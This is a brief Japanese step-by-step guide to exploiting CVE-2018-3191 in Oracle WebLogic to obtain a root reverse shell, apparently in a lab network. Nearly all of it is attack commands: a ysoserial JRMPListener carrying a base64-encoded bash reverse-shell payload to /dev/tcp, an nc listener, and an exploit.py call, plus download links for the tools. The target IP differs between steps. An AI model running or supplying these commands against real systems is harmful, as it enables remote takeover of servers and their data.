
CVE-2018-3191 リバースシェル
CVE-2018-3191 リバースシェル ローカルIP:172.16.38.1 Weblogic:172.16.38.174:7001 1、 ローカルで実行 java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'
その後、nc -lvv 7777 を実行
(1) ここでの bash コマンドは、Runtime.getRuntime().exec() の実行中に特殊記号がエスケープされるのを避けるため、base64 エンコード・デコード処理を行っている。平文は bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 である (2) この操作はローカルで JRMPListener をリッスンし、攻撃対象の weblogic からのリクエストを受信して、指定された bash リバースコマンドを実行する。 (3) Nc が 7777 をリッスンし、weblogic ホストからの bash リバース接続を待つ。 2、 実行 python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222 を実行し、脆弱性を利用して weblogic にリモート RMI サービスへアクセスさせ、bash リバースコマンドを実行させる。
3、 nc がリッスンしているポートがリバース bash を受信し、root 権限が得られる。
攻撃に必要なツール: ysoserial-master.jar //デシリアライズ利用ツールhttps://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 ペイロード生成ツール https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py //weblogic T3 プロトコル送信ツール、CVE-2018-3191 ペイロード統合